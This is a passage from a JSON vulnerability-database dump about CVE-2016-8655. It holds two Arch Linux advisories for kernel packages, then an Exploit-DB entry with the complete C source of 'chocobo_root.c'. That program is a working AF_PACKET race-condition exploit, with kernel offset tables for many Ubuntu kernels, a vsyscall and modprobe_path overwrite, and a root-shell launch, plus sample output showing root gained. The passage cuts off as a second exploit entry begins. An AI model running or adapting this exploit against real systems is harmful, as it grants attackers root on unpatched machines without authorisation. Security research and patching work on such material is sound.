"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-5\n=========================================\n\nSeverity: High\nDate : 2016-12-06\nCVE-ID : CVE-2016-8655\nPackage : linux-grsec\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-grsec before version 1:4.8.12.r201612031658-2 is\nvulnerable to privilege escalation.\n\nResolution\n==========\n\nUpgrade to 1:4.8.12.r201612031658-2.\n\n# pacman -Syu \"linux-grsec>=1:4.8.12.r201612031658-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nPhilip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could\nuse this to cause a denial of service (system crash) or run arbitrary\ncode with administrative privileges.\n\nImpact\n======\n\nA local unprivileged attacker is able to crash the system or run\narbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "ASA-201612-5", "href": "https://security.archlinux.org/ASA-201612-5", "type": "archlinux", "title": "[ASA-201612-5] linux-grsec: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-7\n=========================================\n\nSeverity: High\nDate : 2016-12-06\nCVE-ID : CVE-2016-8655\nPackage : linux-lts\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-lts before version 4.4.36-1 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 4.4.36-1.\n\n# pacman -Syu \"linux-lts>=4.4.36-1\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nPhilip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. A local unprivileged attacker could\nuse this to cause a denial of service (system crash) or run arbitrary\ncode with administrative privileges.\n\nImpact\n======\n\nA local unprivileged attacker is able to crash the system or run\narbitrary code with administrative privileges.\n\nReferences\n==========\n\nhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c\nhttp://seclists.org/oss-sec/2016/q4/607\nhttps://access.redhat.com/security/cve/CVE-2016-8655", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "ASA-201612-7", "href": "https://security.archlinux.org/ASA-201612-7", "type": "archlinux", "title": "[ASA-201612-7] linux-lts: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-11-30T12:32:58", "description": "", "published": "2016-12-06T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2016-12-06T00:00:00", "id": "EDB-ID:40871", "href": "https://www.exploit-db.com/exploits/40871", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit\r\nexploit for Ubuntu 16.04 x86_64\r\n\r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\nuser@ubuntu:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\nuser@ubuntu:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\nuser@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\nuser@ubuntu:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n\r\n\r\nstage 1 completed\r\nregistering new sysctl..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n\r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n\r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\nroot@ubuntu:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n\r\nThere are offsets included for older kernels, but they're untested\r\nso be aware that this exploit will probably crash kernels older than 4.4.\r\n\r\ntested on:\r\nUbuntu 16.04: 4.4.0-51-generic\r\nUbuntu 16.04: 4.4.0-47-generic\r\nUbuntu 16.04: 4.4.0-36-generic\r\nUbuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu\r\n\r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n\r\n11/2016\r\nby rebel\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/if_ether.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <linux/if_packet.h>\r\n#include <pthread.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <sys/syscall.h>\r\n#include <signal.h>\r\n#include <sched.h>\r\n#include <sys/utsname.h>\r\n\r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n\r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n\r\n\r\nstruct offset *off = NULL;\r\n\r\n//99% of these offsets haven't actually been tested :)\r\n\r\nstruct offset offsets[] = {\r\n {\"4.4.0-46-generic #67~14.04.1\",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},\r\n {\"4.4.0-47-generic #68~14.04.1\",0,0,0,0},\r\n {\"4.2.0-41-generic #48\",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},\r\n {\"4.8.0-22-generic #24\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},\r\n {\"4.2.0-34-generic #39\",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},\r\n {\"4.2.0-30-generic #36\",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},\r\n {\"4.2.0-16-generic #19\",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},\r\n {\"4.2.0-17-generic #21\",0,0,0,0},\r\n {\"4.2.0-18-generic #22\",0,0,0,0},\r\n {\"4.2.0-19-generic #23~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},\r\n {\"4.2.0-21-generic #25~14.04.1\",0,0,0,0},\r\n {\"4.2.0-30-generic #36~14.04.1\",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},\r\n {\"4.2.0-27-generic #32~14.04.1\",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},\r\n {\"4.2.0-36-generic #42\",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},\r\n {\"4.4.0-22-generic #40\",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},\r\n {\"4.2.0-18-generic #22~14.04.1\",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},\r\n {\"4.4.0-34-generic #53\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},\r\n {\"4.2.0-22-generic #27\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},\r\n {\"4.2.0-23-generic #28\",0,0,0,0},\r\n {\"4.2.0-25-generic #30\",0,0,0,0},\r\n {\"4.4.0-36-generic #55\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},\r\n {\"4.2.0-42-generic #49\",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},\r\n {\"4.4.0-31-generic #50\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},\r\n {\"4.4.0-22-generic #40~14.04.1\",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},\r\n {\"4.2.0-38-generic #45\",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},\r\n {\"4.4.0-45-generic #66\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},\r\n {\"4.2.0-36-generic #42~14.04.1\",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},\r\n {\"4.4.0-45-generic #66~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},\r\n {\"4.2.0-22-generic #27~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},\r\n {\"4.2.0-25-generic #30~14.04.1\",0,0,0,0},\r\n {\"4.2.0-23-generic #28~14.04.1\",0,0,0,0},\r\n {\"4.4.0-46-generic #67\",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},\r\n {\"4.4.0-47-generic #68\",0,0,0,0},\r\n {\"4.4.0-34-generic #53~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},\r\n {\"4.4.0-36-generic #55~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},\r\n {\"4.4.0-31-generic #50~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},\r\n {\"4.2.0-38-generic #45~14.04.1\",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},\r\n {\"4.2.0-35-generic #40\",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},\r\n {\"4.4.0-24-generic #43~14.04.1\",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},\r\n {\"4.4.0-21-generic #37\",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},\r\n {\"4.2.0-34-generic #39~14.04.1\",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},\r\n {\"4.4.0-24-generic #43\",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},\r\n {\"4.4.0-21-generic #37~14.04.1\",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},\r\n {\"4.2.0-41-generic #48~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},\r\n {\"4.8.0-27-generic #29\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},\r\n {\"4.8.0-26-generic #28\",0,0,0,0},\r\n {\"4.4.0-38-generic #57\",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},\r\n {\"4.4.0-42-generic #62~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},\r\n {\"4.4.0-38-generic #57~14.04.1\",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},\r\n {\"4.4.0-49-generic #70\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},\r\n {\"4.4.0-49-generic #70~14.04.1\",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},\r\n {\"4.2.0-21-generic #25\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},\r\n {\"4.2.0-19-generic #23\",0,0,0,0},\r\n {\"4.2.0-42-generic #49~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},\r\n {\"4.4.0-43-generic #63\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},\r\n {\"4.4.0-28-generic #47\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},\r\n {\"4.4.0-28-generic #47~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},\r\n {\"4.9.0-1-generic #2\",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},\r\n {\"4.8.0-28-generic #30\",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},\r\n {\"4.2.0-35-generic #40~14.04.1\",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},\r\n {\"4.2.0-27-generic #32\",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},\r\n {\"4.4.0-42-generic #62\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},\r\n {\"4.4.0-51-generic #72\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},\r\n//{\"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016\",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},\r\n {NULL,0,0,0,0}\r\n};\r\n\r\n#define VSYSCALL 0xffffffffff600000\r\n\r\n#define PAD 64\r\n\r\nint pad_fds[PAD];\r\n\r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n\r\n#define CONF_RING_FRAMES 1\r\n\r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n\r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n\r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while(barrier) {\r\n }\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n\r\n return NULL;\r\n}\r\n\r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n\r\n while(barrier) {}\r\n\r\n while(1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n y++;\r\n\r\n if(x != 0) break;\r\n\r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n if(x != 0) break;\r\n\r\n y++;\r\n }\r\n\r\n fprintf(stderr,\"version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n\r\n\r\n return NULL;\r\n}\r\n\r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n\r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\",\"wtf\",exploitbuf,BUFSIZE-24,-2);\r\n}\r\n\r\n\r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n\r\n for(x=0; x<PAD; x++)\r\n if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {\r\n fprintf(stderr,\"pad_kmalloc() socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n}\r\n\r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n\r\n sigemptyset(&set);\r\n\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n fprintf(stderr,\"new exploit attempt starting, jumping to %p, arg=%p\\n\",(void *)func,(void *)arg);\r\n\r\n pad_kmalloc();\r\n\r\n fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));\r\n\r\n if (fd==-1) {\r\n printf(\"target socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n pad_kmalloc();\r\n\r\n fprintf(stderr,\"sockets allocated\\n\");\r\n\r\n val = TPACKET_V3;\r\n\r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n\r\n//try to set the timeout to 10 seconds\r\n//the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n\r\n sfd = fd;\r\n\r\n if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n fprintf(stderr, \"Error creating thread\\n\");\r\n return 1;\r\n }\r\n\r\n\r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n\r\n usleep(200000);\r\n\r\n fprintf(stderr,\"removing barrier and spraying..\\n\");\r\n\r\n memset(exploitbuf,'\\x00',BUFSIZE);\r\n\r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n\r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n\r\n\r\n barrier = 0;\r\n\r\n usleep(100000);\r\n\r\n while(!vers_switcher_done)usleep(100000);\r\n\r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n\r\n fprintf(stderr,\"current packet version = %d\\n\",val);\r\n\r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n\r\n\r\n if(pbd == MAP_FAILED) {\r\n fprintf(stderr,\"could not map pbd\\n\");\r\n exit(1);\r\n }\r\n\r\n else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n fprintf(stderr,\"pbd->hdr.bh1.offset_to_first_pkt = %d\\n\",off);\r\n }\r\n\r\n\r\n if(val == TPACKET_V1 && off != 0) {\r\n fprintf(stderr,\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n }\r\n\r\n else {\r\n fprintf(stderr,\"race not won\\n\");\r\n exit(2);\r\n }\r\n\r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n\r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n\r\n fprintf(stderr,\"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n sleep(1);\r\n fprintf(stderr,\"closing socket and verifying..\");\r\n\r\n close(sfd);\r\n\r\n kmalloc();\r\n\r\n fprintf(stderr,\"all messages sent\\n\");\r\n\r\n sleep(31337);\r\n exit(1);\r\n}\r\n\r\n\r\nint verification_result = 0;\r\n\r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n\r\n\r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n\r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n signal(SIGSEGV, catch_sigsegv);\r\n\r\n *vsyscall = 0xdeadbeef+x;\r\n\r\n if(*vsyscall == 0xdeadbeef+x) {\r\n fprintf(stderr,\"\\nvsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\nvoid verify_stage1(void)\r\n{\r\n int x;\r\n pthread_t v_thread;\r\n\r\n sleep(5);\r\n\r\n for(x=0; x<300; x++) {\r\n\r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n\r\n pthread_join(v_thread, NULL);\r\n\r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n printf(\"could not modify vsyscall\\n\");\r\n\r\n exit(1);\r\n}\r\n\r\nvoid verify_stage2(void)\r\n{\r\n int x;\r\n struct stat b;\r\n\r\n sleep(5);\r\n\r\n for(x=0; x<300; x++) {\r\n\r\n if(stat(\"/proc/sys/hack\",&b) == 0) {\r\n fprintf(stderr,\"\\nsysctl added!\\n\");\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n printf(\"could not add sysctl\\n\");\r\n exit(1);\r\n\r\n\r\n}\r\n\r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n\r\nretry:\r\n\r\n pid = fork();\r\n\r\n if(pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n\r\n wait(&status);\r\n\r\n printf(\"\\n\");\r\n\r\n if(WEXITSTATUS(status) == 2) {\r\n printf(\"retrying stage..\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n\r\n else if(WEXITSTATUS(status) != 0) {\r\n printf(\"something bad happened, aborting exploit attempt\\n\");\r\n exit(-1);\r\n }\r\n\r\n\r\n\r\n kill(pid, 9);\r\n}\r\n\r\n\r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n\r\n fprintf(stderr,\"exploit starting\\n\");\r\n printf(\"making vsyscall page writable..\\n\\n\");\r\n\r\n exploit(off->set_memory_rw, VSYSCALL, verify_stage1);\r\n\r\n printf(\"\\nstage 1 completed\\n\");\r\n\r\n sleep(5);\r\n\r\n printf(\"registering new sysctl..\\n\\n\");\r\n\r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n\r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n\r\n strcpy((char *)(VSYSCALL+0xf00),\"hack\");\r\n memcpy((char *)(VSYSCALL+0xe00),\"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(off->proc_dostring);\r\n c->data = (void *)(off->modprobe_path);\r\n c->maxlen=256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n\r\n exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);\r\n\r\n printf(\"stage 2 completed\\n\");\r\n}\r\n\r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n\r\n\r\n fd = open(\"/proc/sys/hack\",O_WRONLY);\r\n\r\n if(fd == -1) {\r\n fprintf(stderr,\"could not open /proc/sys/hack\\n\");\r\n exit(-1);\r\n }\r\n\r\n memset(buf,'\\x00', 256);\r\n\r\n readlink(\"/proc/self/exe\",(char *)&buf,256);\r\n\r\n write(fd,buf,strlen(buf)+1);\r\n\r\n socket(AF_INET,SOCK_STREAM,132);\r\n\r\n if(stat(buf,&s) == 0 && s.st_uid == 0) {\r\n printf(\"binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd,\"/sbin/modprobe\",15);\r\n close(fd);\r\n execl(buf,buf,NULL);\r\n }\r\n\r\n else\r\n printf(\"could not create rootshell\\n\");\r\n\r\n\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n int i, crash = 0;\r\n char buf[512], *f;\r\n\r\n\r\n if(argc == 2 && !strcmp(argv[1],\"crash\")) {\r\n crash = 1;\r\n }\r\n\r\n\r\n if(getuid() == 0 && geteuid() == 0 && !crash) {\r\n chown(\"/proc/self/exe\",0,0);\r\n chmod(\"/proc/self/exe\",06755);\r\n exit(-1);\r\n }\r\n\r\n else if(getuid() != 0 && geteuid() == 0 && !crash) {\r\n setresuid(0,0,0);\r\n setresgid(0,0,0);\r\n execl(\"/bin/bash\",\"bash\",\"-p\",NULL);\r\n exit(0);\r\n }\r\n\r\n fprintf(stderr,\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n\r\n uname(&u);\r\n\r\n if((f = strstr(u.version,\"-Ubuntu\")) != NULL) *f = '\\0';\r\n\r\n snprintf(buf,512,\"%s %s\",u.release,u.version);\r\n\r\n printf(\"kernel version: %s\\n\",buf);\r\n\r\n\r\n for(i=0; offsets[i].kernel_version != NULL; i++) {\r\n if(!strcmp(offsets[i].kernel_version,buf)) {\r\n\r\n while(offsets[i].proc_dostring == 0)\r\n i--;\r\n\r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n\r\n if(crash) {\r\n off = &offsets[0];\r\n off->set_memory_rw = 0xffffffff41414141;\r\n }\r\n\r\n if(off) {\r\n printf(\"proc_dostring = %p\\n\",(void *)off->proc_dostring);\r\n printf(\"modprobe_path = %p\\n\",(void *)off->modprobe_path);\r\n printf(\"register_sysctl_table = %p\\n\",(void *)off->register_sysctl_table);\r\n printf(\"set_memory_rw = %p\\n\",(void *)off->set_memory_rw);\r\n }\r\n\r\n if(!off) {\r\n fprintf(stderr,\"i have no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n\r\n pid = fork();\r\n\r\n if(pid == 0) {\r\n if(unshare(CLONE_NEWUSER) != 0)\r\n fprintf(stderr, \"failed to create new user namespace\\n\");\r\n\r\n if(unshare(CLONE_NEWNET) != 0)\r\n fprintf(stderr, \"failed to create new network namespace\\n\");\r\n\r\n wrapper();\r\n exit(0);\r\n }\r\n\r\n waitpid(pid, &status, 0);\r\n\r\n launch_rootshell();\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40871"}, {"lastseen": "2019-07-26T11:22:52", "description": "", "published": "2018-12-29T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-12-29T00:00:00", "id": "EDB-ID:47170", "href": "https://www.exploit-db.com/exploits/47170", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit for CVE-2016-8655.\r\nIncludes KASLR and SMEP/SMAP bypasses.\r\nFor Ubuntu 14.04 / 16.04 